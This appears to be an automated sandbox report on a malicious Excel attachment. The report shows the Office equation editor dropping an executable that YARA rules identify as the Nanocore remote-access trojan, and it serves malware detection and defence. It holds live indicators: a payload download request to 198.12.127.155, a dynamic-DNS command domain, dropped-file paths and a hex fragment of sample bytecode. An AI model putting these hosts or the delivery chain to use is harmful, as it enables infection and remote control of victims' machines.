00 03 00 00 00 0d 00 00 06 10 8f 00 00 32 b8 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 03 00 be 00 00 00 01 00 00 11 20 01 00 00 00 fe 0e 00 00 38 00 00 00 00 fe 0c 00 00 45 05 00 00 00 7d 00 00 00 29 00 00 00 05 00 00 00 49 00 00 00 88 00 00 00 38 78 00 00 00 28 04 00 00 06 38 00 00 00 00 38 74 00 00 00 20 04 00 00 00 7e 87 00 00 04 39 c4 ff ff ff 26 38 ba ff ff ff 18 3a 34 00 00 00 20 00 00 00 00 7e 61 00 00 04 3a a9 ff ff ff 26 20 00 00 00 00 38 9e ff ff ff 38 2f 00 00 00 20 02 00 00 00 7e 7b 00 00 04 3a 8a ff ff ff 26 38 80 ff ff ff 28 03 00 00 06 20 03 00 00 00 7e 2a 00 00 04 39 70 ff ff ff 26 38 66 ff ff ff 1d 3a 82 ff ff ff 38 01 00 00 00 2a 38 fa ff ff ff 38 d0 ff ff ff 00 00 06 2a 00 00 1e 00 28 02 00 00 06 2a 1e 00 28 30 00 00 06 2a 26 7e 01 00 00 04 14 fe 01 2a 00 00 1a 7e 01 00 00 04 2a 00 13 30 04 00 74 00 00 00 01 00 00 11 02 28 01 00 00 0a 20 00 00 00 00 7e 21 00 00 04 3a 14 00 00 00 26 20 00 00 00 00 38 09 00 00 00 38 db ff ff ff fe 0c 0

Source: Joe Sandbox View

IP Address: 79.134.225.90 79.134.225.90

Source: Joe Sandbox View	ASN Name: FINK-TELECOM-SERVICESCH FINK-TELECOM-SERVICESCH
Source: Joe Sandbox View	ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS

Source: global traffic

HTTP traffic detected: GET /new.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.12.127.155Connection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.127.155
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.127.155
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.127.155
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.127.155
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.127.155
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.127.155
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.127.155
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.127.155
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.127.155
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.127.155
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.127.155
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.127.155
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.127.155
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.127.155
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.127.155
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.127.155
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.127.155
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.127.155
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.127.155
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.127.155
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.127.155
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.127.155
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.127.155
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.127.155
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.127.155
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.127.155
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.127.155
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.127.155
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.127.155
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.127.155
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.127.155
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.127.155
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.127.155
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.127.155
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.127.155
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.127.155
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.127.155
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.127.155
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.127.155
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.127.155
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.127.155
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.127.155
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.127.155
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.127.155
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.127.155
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.127.155
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.127.155
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.127.155
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.127.155
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.127.155

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FFD606D5.emf

Jump to behavior

Source: global traffic

Source: unknown

DNS traffic detected: queries for: wekeepworking.sytes.net

Source: RegAsm.exe, 00000005.00000002.2363776217.0000000000A50000.00000004.00000001.sdmp	String found in binary or memory: http://google.com
Source: RegAsm.exe, 00000005.00000002.2364096438.0000000002630000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: RegAsm.exe, 00000005.00000002.2364096438.0000000002630000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: FFD606D5.emf.0.dr	String found in binary or memory: http://www.day.com/dam/1.0

Source: RegAsm.exe, 00000005.00000002.2365764646.0000000003B49000.00000004.00000001.sdmp

Binary or memory string: RegisterRawInputDevices

E-Banking Fraud:

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 00000004.00000002.2208200513.00000000032B1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2363468817.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2208432610.0000000003526000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.2206635485.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2363977064.0000000000DE0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.2207136655.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2364567768.0000000002A21000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2365764646.0000000003B49000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2208264048.0000000003395000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 2164, type: MEMORY
Source: Yara match	File source: 4.2.vbc.exe.3627c48.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.3486e00.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegAsm.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.340edc0.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.3486e00.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.3627c48.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegAsm.exe.de4629.13.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegAsm.exe.de0000.14.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.3436de0.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegAsm.exe.de0000.14.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.RegAsm.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.RegAsm.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.3436de0.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.340edc0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegAsm.exe.3b73634.26.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegAsm.exe.3b67402.28.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegAsm.exe.3b625d6.27.raw.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 00000005.00000002.2363768738.0000000000A40000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000004.00000002.2208102788.00000000022FC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000004.00000002.2208102788.00000000022FC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000005.00000002.2363611827.0000000000660000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000005.00000002.2364015213.0000000000E80000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000004.00000002.2208200513.00000000032B1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000004.00000002.2208200513.00000000032B1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000005.00000002.2363776217.0000000000A50000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000005.00000002.2363541585.00000000005A0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000005.00000002.2363994318.0000000000E10000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000005.00000002.2363897217.0000000000C10000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000005.00000002.2363890046.0000000000C00000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000005.00000002.2363636659.00000000006C0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000005.00000002.2363548286.00000000005B0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000005.00000002.2363938383.0000000000CB0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000005.00000002.2363468817.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000005.00000002.2363468817.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000004.00000002.2208432610.0000000003526000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000004.00000002.2208432610.0000000003526000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000005.00000000.2206635485.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000005.00000000.2206635485.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000005.00000002.2363977064.0000000000DE0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000005.00000002.2363557929.00000000005C0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000005.00000000.2207136655.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000005.00000000.2207136655.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000005.00000002.2364567768.0000000002A21000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000005.00000002.2365764646.0000000003B49000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000004.00000002.2208264048.0000000003395000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000004.00000002.2208264048.0000000003395000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: vbc.exe PID: 1616, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: vbc.exe PID: 1616, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: RegAsm.exe PID: 2164, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: RegAsm.exe PID: 2164, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.2.RegAsm.exe.c10000.11.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.RegAsm.exe.cb0000.12.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 4.2.vbc.exe.3627c48.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 4.2.vbc.exe.3627c48.8.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.2.RegAsm.exe.e80000.19.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.RegAsm.exe.6c0000.7.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.RegAsm.exe.3b67402.28.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.RegAsm.exe.2a5109c.23.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.RegAsm.exe.c00000.10.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.RegAsm.exe.e1e8a4.18.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.RegAsm.exe.a40000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.RegAsm.exe.5b0000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 4.2.vbc.exe.3486e00.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 4.2.vbc.exe.3486e00.5.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.2.RegAsm.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.RegAsm.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.2.RegAsm.exe.5c0000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 4.2.vbc.exe.340edc0.7.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 4.2.vbc.exe.340edc0.7.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.2.RegAsm.exe.5b0000.4.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.RegAsm.exe.5a0000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.RegAsm.exe.e80000.19.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.RegAsm.exe.2a44ddc.25.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 4.2.vbc.exe.3486e00.5.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 4.2.vbc.exe.3486e00.5.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 4.2.vbc.exe.3627c48.8.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 4.2.vbc.exe.3627c48.8.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.2.RegAsm.exe.e10000.17.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.RegAsm.exe.a50000.9.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.RegAsm.exe.de4629.13.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.RegAsm.exe.de0000.14.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.RegAsm.exe.c10000.11.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.RegAsm.exe.cb0000.12.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.RegAsm.exe.3b73634.26.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 4.2.vbc.exe.3436de0.6.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 4.2.vbc.exe.3436de0.6.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.2.RegAsm.exe.de0000.14.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.RegAsm.exe.5c0000.5.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.0.RegAsm.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.0.RegAsm.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.2.RegAsm.exe.c00000.10.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.RegAsm.exe.6c0000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.0.RegAsm.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.0.RegAsm.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.2.RegAsm.exe.660000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.RegAsm.exe.a50000.9.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.RegAsm.exe.e10000.17.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.RegAsm.exe.e14c9f.16.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.RegAsm.exe.2a5109c.23.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.RegAsm.exe.2a5109c.23.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 4.2.vbc.exe.3436de0.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 4.2.vbc.exe.3436de0.6.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 4.2.vbc.exe.340edc0.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 4.2.vbc.exe.340edc0.7.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.2.RegAsm.exe.2a3fd90.24.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.RegAsm.exe.2a3fd90.24.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.2.RegAsm.exe.3b73634.26.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.RegAsm.exe.3b73634.26.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.2.RegAsm.exe.3b67402.28.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.RegAsm.exe.3b67402.28.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.2.RegAsm.exe.2a44ddc.25.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.RegAsm.exe.2a44ddc.25.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.2.RegAsm.exe.3b625d6.27.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.RegAsm.exe.3b625d6.27.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>

Office equation editor drops PE file

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\new[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file

Source: C:\Users\Public\vbc.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior

Source: C:\Users\Public\vbc.exe	Code function: 4_2_001D3DD0	4_2_001D3DD0
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00431C02	4_2_00431C02
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00431C20	4_2_00431C20
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00431B97	4_2_00431B97
Source: C:\Users\Public\vbc.exe	Code function: 4_2_042C9E18	4_2_042C9E18
Source: C:\Users\Public\vbc.exe	Code function: 4_2_042C63E8	4_2_042C63E8
Source: C:\Users\Public\vbc.exe	Code function: 4_2_042CF730	4_2_042CF730
Source: C:\Users\Public\vbc.exe	Code function: 4_2_042C0048	4_2_042C0048
Source: C:\Users\Public\vbc.exe	Code function: 4_2_042C0044	4_2_042C0044
Source: C:\Users\Public\vbc.exe	Code function: 4_2_04A00048	4_2_04A00048
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe	Code function: 5_2_003C3DFE	5_2_003C3DFE
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe	Code function: 5_2_003544F0	5_2_003544F0
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe	Code function: 5_2_003538D8	5_2_003538D8
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe	Code function: 5_2_0035CB70	5_2_0035CB70
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe	Code function: 5_2_0035BF58	5_2_0035BF58
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe	Code function: 5_2_003545A8	5_2_003545A8
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe	Code function: 5_2_0035CC2E	5_2_0035CC2E
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe	Code function: 5_2_00CD08C8	5_2_00CD08C8
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe	Code function: 5_2_00CD1578	5_2_00CD1578
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe	Code function: 5_2_00CD1636	5_2_00CD1636

Source: Ref 0180066743.xlsx

OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\RegAsm.exe 5FF87E563B2DF09E94E17C82741D9A43AED2F214643DC067232916FAE4B35417

Source: new[1].exe.2.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: new[1].exe.2.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: new[1].exe.2.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: win33.exe.4.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: win33.exe.4.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: win33.exe.4.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: 00000005.00000002.2363768738.0000000000A40000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000005.00000002.2363768738.0000000000A40000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000004.00000002.2208102788.00000000022FC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000004.00000002.2208102788.00000000022FC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000005.00000002.2363611827.0000000000660000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000005.00000002.2363611827.0000000000660000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
